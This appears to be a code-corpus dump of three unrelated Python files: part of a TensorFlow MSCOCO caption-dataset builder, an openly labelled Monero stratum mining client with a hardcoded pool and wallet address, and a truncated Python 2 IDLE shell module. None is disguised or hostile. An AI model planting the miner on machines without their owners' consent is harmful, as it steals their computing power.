# instance, if num_shards = 128, and num_threads = 2, then the first thread
# would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_images_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = "%s-%.5d-of-%.5d" % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_dir, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
images_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in images_in_shard:
image = images[i]
sequence_example = _to_sequence_example(image, decoder, vocab)
if sequence_example is not None:
writer.write(sequence_example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print("%s [thread %d]: Processed %d of %d items in thread batch." %
(datetime.now(), thread_index, counter, num_images_in_thread))
sys.stdout.flush()
writer.close()
print("%s [thread %d]: Wrote %d image-caption pairs to %s" %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print("%s [thread %d]: Wrote %d image-caption pairs to %d shards." %
(datetime.now(), thread_index, counter, num_shards_per_batch))
sys.stdout.flush()
def _process_dataset(name, images, vocab, num_shards):
"""Processes a complete data set and saves it as a TFRecord.
Args:
name: Unique identifier specifying the dataset.
images: List of ImageMetadata.
vocab: A Vocabulary object.
num_shards: Integer number of shards for the output files.
"""
# Break up each image into a separate entity for each caption.
images = [ImageMetadata(image.image_id, image.filename, [caption])
for image in images for caption in image.captions]
# Shuffle the ordering of images. Make the randomization repeatable.
random.seed(12345)
random.shuffle(images)
# Break the images into num_threads batches. Batch i is defined as
# images[ranges[i][0]:ranges[i][1]].
num_threads = min(num_shards, FLAGS.num_threads)
spacing = np.linspace(0, len(images), num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a utility for decoding JPEG images to run sanity checks.
decoder = ImageDecoder()
# Launch a thread for each batch.
print("Launching %d threads for spacings: %s" % (num_threads, ranges))
for thread_index in xrange(len(ranges)):
args = (thread_index, ranges, name, images, decoder, vocab, num_shards)
t = threading.Thread(target=_process_image_files, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print("%s: Finished processing all %d image-caption pairs in data set '%s'." %
(datetime.now(), len(images), name))
def _create_vocab(captions):
"""Creates the vocabulary of word to word_id.
The vocabulary is saved to disk in a text file of word counts. The id of each
word in the file is its corresponding 0-based line number.
Args:
captions: A list of lists of strings.
Returns:
A Vocabulary object.
"""
print("Creating vocabulary.")
counter = Counter()
for c in captions:
counter.update(c)
print("Total words:", len(counter))
# Filter uncommon words and sort by descending count.
word_counts = [x for x in counter.items() if x[1] >= FLAGS.min_word_count]
word_counts.sort(key=lambda x: x[1], reverse=True)
print("Words in vocabulary:", len(word_counts))
# Write out the word counts file.
with tf.gfile.FastGFile(FLAGS.word_counts_output_file, "w") as f:
f.write("\n".join(["%s %d" % (w, c) for w, c in word_counts]))
print("Wrote vocabulary file:", FLAGS.word_counts_output_file)
# Create the vocabulary dictionary.
reverse_vocab = [x[0] for x in word_counts]
unk_id = len(reverse_vocab)
vocab_dict = dict([(x, y) for (y, x) in enumerate(reverse_vocab)])
vocab = Vocabulary(vocab_dict, unk_id)
return vocab
def _process_caption(caption):
"""Processes a caption string into a list of tonenized words.
Args:
caption: A string caption.
Returns:
A list of strings; the tokenized caption.
"""
tokenized_caption = [FLAGS.start_word]
tokenized_caption.extend(nltk.tokenize.word_tokenize(caption.lower()))
tokenized_caption.append(FLAGS.end_word)
return tokenized_caption
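# Illustrative example, not part of the original script: with the default
# flags, _process_caption("A dog runs.") yields something like
# ["<S>", "a", "dog", "runs", ".", "</S>"], depending on the NLTK tokenizer.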
def _load_and_process_metadata(captions_file, image_dir):
"""Loads image metadata from a JSON file and processes the captions.
Args:
captions_file: JSON file containing caption annotations.
image_dir: Directory containing the image files.
Returns:
A list of ImageMetadata.
"""
with tf.gfile.FastGFile(captions_file, "r") as f:
caption_data = json.load(f)
# Extract the filenames.
id_to_filename = [(x["id"], x["file_name"]) for x in caption_data["images"]]
# Extract the captions. Each image_id is associated with multiple captions.
id_to_captions = {}
for annotation in caption_data["annotations"]:
image_id = annotation["image_id"]
caption = annotation["caption"]
id_to_captions.setdefault(image_id, [])
id_to_captions[image_id].append(caption)
assert len(id_to_filename) == len(id_to_captions)
assert set([x[0] for x in id_to_filename]) == set(id_to_captions.keys())
print("Loaded caption metadata for %d images from %s" %
(len(id_to_filename), captions_file))
# Process the captions and combine the data into a list of ImageMetadata.
print("Proccessing captions.")
image_metadata = []
num_captions = 0
for image_id, base_filename in id_to_filename:
filename = os.path.join(image_dir, base_filename)
captions = [_process_caption(c) for c in id_to_captions[image_id]]
image_metadata.append(ImageMetadata(image_id, filename, captions))
num_captions += len(captions)
print("Finished processing %d captions for %d images in %s" %
(num_captions, len(id_to_filename), captions_file))
return image_metadata
def main(unused_argv):
def _is_valid_num_shards(num_shards):
"""Returns True if num_shards is compatible with FLAGS.num_threads."""
return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads
assert _is_valid_num_shards(FLAGS.train_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.train_shards")
assert _is_valid_num_shards(FLAGS.val_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.val_shards")
assert _is_valid_num_shards(FLAGS.test_shards), (
"Please make the FLAGS.num_threads commensurate with FLAGS.test_shards")
if not tf.gfile.IsDirectory(FLAGS.output_dir):
tf.gfile.MakeDirs(FLAGS.output_dir)
# Load image metadata from caption files.
mscoco_train_dataset = _load_and_process_metadata(FLAGS.train_captions_file,
FLAGS.train_image_dir)
mscoco_val_dataset = _load_and_process_metadata(FLAGS.val_captions_file,
FLAGS.val_image_dir)
# Redistribute the MSCOCO data as follows:
# train_dataset = 100% of mscoco_train_dataset + 85% of mscoco_val_dataset.
# val_dataset = 5% of mscoco_val_dataset (for validation during training).
# test_dataset = 10% of mscoco_val_dataset (for final evaluation).
train_cutoff = int(0.85 * len(mscoco_val_dataset))
val_cutoff = int(0.90 * len(mscoco_val_dataset))
train_dataset = mscoco_train_dataset + mscoco_val_dataset[0:train_cutoff]
val_dataset = mscoco_val_dataset[train_cutoff:val_cutoff]
test_dataset = mscoco_val_dataset[val_cutoff:]
# Create vocabulary from the training captions.
train_captions = [c for image in train_dataset for c in image.captions]
vocab = _create_vocab(train_captions)
_process_dataset("train", train_dataset, vocab, FLAGS.train_shards)
_process_dataset("val", val_dataset, vocab, FLAGS.val_shards)
_process_dataset("test", test_dataset, vocab, FLAGS.test_shards)
if __name__ == "__main__":
tf.app.run()
|
stratum-miner.py | # Copyright (c) 2019, The Monero Project
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import socket
import select
import binascii
import pycryptonight
import pyrx
import struct
import json
import sys
import os
import time
from multiprocessing import Process, Queue
pool_host = 'pool.supportxmr.com'
pool_port = 3333
pool_pass = 'worker-1'
wallet_address = '46ctPo673sfZiT1SCSKz8yGqvdgqYKaMUQM3Ur8jpjV6hSFRHN7QVq68qX1ywHdCZpKm1dSYt82oa9L2Q4ZZpSTyERd8JdG'
def main():
pool_ip = socket.gethostbyname(pool_host)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((pool_ip, pool_port))
q = Queue()
proc = Process(target=worker, args=(q, s))
proc.daemon = True
proc.start()
login = {
'method': 'login',
'params': {
'login': wallet_address,
'pass': pool_pass,
'rigid': '',
'agent': 'stratum-miner-py/0.1'
},
'id':1
}
    login_id = ''  # set by the login response; guards the 'job' branch below
    print('Logging into pool: {}:{}'.format(pool_host, pool_port))
s.sendall(str(json.dumps(login)+'\n').encode('utf-8'))
try:
while 1:
line = s.makefile().readline()
r = json.loads(line)
error = r.get('error')
result = r.get('result')
method = r.get('method')
params = r.get('params')
if error:
print('Error: {}'.format(error))
continue
if result and result.get('status'):
print('Status: {}'.format(result.get('status')))
if result and result.get('job'):
login_id = result.get('id')
job = result.get('job')
job['login_id'] = login_id
q.put(job)
elif method and method == 'job' and len(login_id):
q.put(params)
except KeyboardInterrupt:
print('{}Exiting'.format(os.linesep))
proc.terminate()
s.close()
sys.exit(0)
def pack_nonce(blob, nonce):
b = binascii.unhexlify(blob)
bin = struct.pack('39B', *bytearray(b[:39]))
bin += struct.pack('I', nonce)
bin += struct.pack('{}B'.format(len(b)-43), *bytearray(b[43:]))
return bin
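def _demo_pack_nonce():
    # Illustrative sketch, not part of the original script: a Monero hashing
    # blob reserves bytes [39:43) for the 32-bit nonce; pack_nonce splices the
    # new nonce into that window and leaves the rest of the blob unchanged.
    blob = '00' * 76  # dummy 76-byte blob, hex-encoded like a pool job blob
    packed = pack_nonce(blob, 1)
    return binascii.hexlify(packed[39:43]).decode()  # '01000000' on little-endian hosts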
def worker(q, s):
started = time.time()
hash_count = 0
while 1:
job = q.get()
if job.get('login_id'):
login_id = job.get('login_id')
print('Login ID: {}'.format(login_id))
blob = job.get('blob')
target = job.get('target')
job_id = job.get('job_id')
height = job.get('height')
block_major = int(blob[:2], 16)
cnv = 0
if block_major >= 7:
cnv = block_major - 6
if cnv > 5:
seed_hash = binascii.unhexlify(job.get('seed_hash'))
print('New job with target: {}, RandomX, height: {}'.format(target, height))
else:
print('New job with target: {}, CNv{}, height: {}'.format(target, cnv, height))
target = struct.unpack('I', binascii.unhexlify(target))[0]
if target >> 32 == 0:
target = int(0xFFFFFFFFFFFFFFFF / int(0xFFFFFFFF / target))
nonce = 1
while 1:
bin = pack_nonce(blob, nonce)
if cnv > 5:
hash = pyrx.get_rx_hash(bin, seed_hash, height)
else:
hash = pycryptonight.cn_slow_hash(bin, cnv, 0, height)
hash_count += 1
sys.stdout.write('.')
sys.stdout.flush()
hex_hash = binascii.hexlify(hash).decode()
r64 = struct.unpack('Q', hash[24:])[0]
if r64 < target:
elapsed = time.time() - started
hr = int(hash_count / elapsed)
print('{}Hashrate: {} H/s'.format(os.linesep, hr))
submit = {
'method':'submit',
'params': {
'id': login_id,
'job_id': job_id,
'nonce': binascii.hexlify(struct.pack('<I', nonce)).decode(),
'result': hex_hash
},
'id':1
}
print('Submitting hash: {}'.format(hex_hash))
s.sendall(str(json.dumps(submit)+'\n').encode('utf-8'))
select.select([s], [], [], 3)
if not q.empty():
break
nonce += 1
if __name__ == '__main__':
main()
|
PyShell.py | #! /usr/bin/env python
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import traceback
import types
import exceptions
import linecache
from code import InteractiveInterpreter
from Tkinter import *
import tkMessageBox
from EditorWindow import EditorWindow, fixwordbreaks
from FileList import FileList
from ColorDelegator import ColorDelegator
from UndoDelegator import UndoDelegator
from OutputWindow import OutputWindow
from configHandler import idleConf
import idlever
import rpc
import Debugger
import RemoteDebugger
IDENTCHARS = string.ascii_letters + string.digits + "_"
LOCALHOST = '127.0.0.1'
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
# Change warnings module to write to sys.__stderr__
try:
import warnings
except ImportError:
pass
else:
def idle_showwarning(message, category, filename, lineno):
file = sys.__stderr__
file.write(warnings.formatwarning(message, category, filename, lineno))
warnings.showwarning = idle_showwarning
def extended_linecache_checkcache(orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the pyshell#
entries, call the original linecache.checkcache(), and then restore the
saved entries. Assigning the orig_checkcache keyword arg freezes its value
at definition time to the (original) method linecache.checkcache(), i.e.
makes orig_checkcache lexical.
"""
cache = linecache.cache
save = {}
for filename in cache.keys():
if filename[:1] + filename[-1:] == '<>':
save[filename] = cache[filename]
orig_checkcache()
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
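# Illustrative note, not part of the original file: binding orig_checkcache as
# a default argument captures the original function at definition time, so the
# patched version cannot recurse into itself. The same idiom in miniature:
#
#   def patched(orig=linecache.checkcache):
#       ...  # save/restore bookkeeping
#       orig()
#   linecache.checkcache = patched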
class PyShellEditorWindow(EditorWindow):
"Regular text edit window when a shell is present"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
if self.io.filename: self.restore_file_breaks()
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
rmenu_specs = [("Set Breakpoint", "<<set-breakpoint-here>>"),
("Clear Breakpoint", "<<clear-breakpoint-here>>")]
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
i = self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text. Certain
# kinds of edits cause these ranges to be deleted: Inserting
# or deleting a line just before a breakpoint, and certain
# deletions prior to a breakpoint. These issues need to be
# investigated and understood. It's not clear if they are
# Tk issues or IDLE issues, or whether they can actually
# be fixed. Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
lines = open(self.breakpointPath,"r").readlines()
except IOError:
lines = []
new_file = open(self.breakpointPath,"w")
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
new_file.close()
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index]))
end = int(float(ranges[index+1]))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: file list when a shell is present"
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.wakeup()
else:
self.pyshell = PyShell(self)
self.pyshell.begin()
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main','Theme','name')
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
None: idleConf.GetHighlight(theme, "normal"),
})
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = self.build_subprocess_arglist()
port = 8833
rpcclt = None
rpcpid = None
def spawn_subprocess(self):
args = self.subprocess_arglist
self.rpcpid = os.spawnv(os.P_NOWAIT, args[0], args)
def build_subprocess_arglist(self):
w = ['-W' + s for s in sys.warnoptions]
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(" + `del_exitf` +")"
else:
command = "__import__('run').main(" + `del_exitf` + ")"
return [sys.executable] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (LOCALHOST, self.port)
# Idle starts listening for connection on localhost
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error, err:
print>>sys.__stderr__,"IDLE socket error: " + err[1]\
+ ", retrying..."
else:
display_port_binding_error()
sys.exit()
self.spawn_subprocess()
# Accept the connection from the Python execution server
self.rpcclt.accept()
self.rpcclt.register("stdin", self.tkconsole)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path()
self.poll_subprocess()
def restart_subprocess(self):
if self.restarting:
return
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.unix_terminate()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
self.rpcclt.accept()
self.transfer_path()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
if was_executing:
console.write('\n')
console.showprompt()
halfbar = ((int(console.width) - 16) // 2) * '='
console.write(halfbar + ' RESTART ' + halfbar)
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.restarting = False
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
self.rpcclt.close()
self.unix_terminate()
self.tkconsole.executing = False
self.rpcclt = None
def unix_terminate(self):
"UNIX: make sure subprocess is terminated and collect status"
if hasattr(os, 'kill'):
try:
os.kill(self.rpcpid, SIGTERM)
except OSError:
# process already terminated:
return
else:
try:
os.waitpid(self.rpcpid, 0)
except OSError:
return
def transfer_path(self):
self.runcommand("""if 1:
import sys as _sys
_sys.path = %s
del _sys
_msg = 'Use File/Exit or your end-of-file key to quit IDLE'
__builtins__.quit = __builtins__.exit = _msg
del _msg
\n""" % `sys.path`)
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print >>console, `what`
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print >>sys.__stderr__, errmsg, what
print >>console, errmsg, what
# we received a response to the currently active seq number:
self.tkconsole.endexecuting()
# Reschedule myself
if not self.tkconsole.closing:
self.tkconsole.text.after(self.tkconsole.pollinterval,
self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
        static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
sc = ScrolledCanvas(top, bg="white", highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
source = open(filename, "r").read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
tkerr = self.tkconsole.stderr
print>>tkerr, '*** Error in script or command!\n'
print>>tkerr, 'Traceback (most recent call last):'
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
if isinstance(source, types.UnicodeType):
import IOBinding
try:
source = source.encode(IOBinding.encoding)
except UnicodeError:
self.tkconsole.resetoutput()
self.write("Unsupported characters in input")
return
try:
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
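# Hedged aside (illustrative sketch, not IDLE code): stuffsource() seeds
# linecache because traceback formatting consults linecache.getline(), so
# registering shell input under a fake "<pyshell#N>" name lets tracebacks
# show the line the user typed. A module-level demo of the same trick:
def _linecache_demo():
demo_source = "x = 1\n1/0\n"
fake = "<demo#0>"
linecache.cache[fake] = len(demo_source) + 1, 0, demo_source.split("\n"), fake
return linecache.getline(fake, 2) # -> "1/0"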
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %s
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % `filename`)
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
text.tag_add("ERROR", pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
self.tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return msg, lineno, offset, line
else:
return None
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != "<>":
del c[key]
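# Drops real-file entries (so edited files are re-read from disk) while
# keeping the "<pyshell#N>"-style pseudo-files that exist only in the cache.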
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
master=self.tkconsole.text)
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
try:
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
master=self.tkconsole.text):
raise
else:
self.showtraceback()
except:
self.showtraceback()
finally:
if not use_subprocess:
self.tkconsole.endexecuting()
def write(self, s):
"Override base class method"
self.tkconsole.stderr.write(s)
class PyShell(OutputWindow):
shell_title = "Python Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
# New classes
from IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "_Shell"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
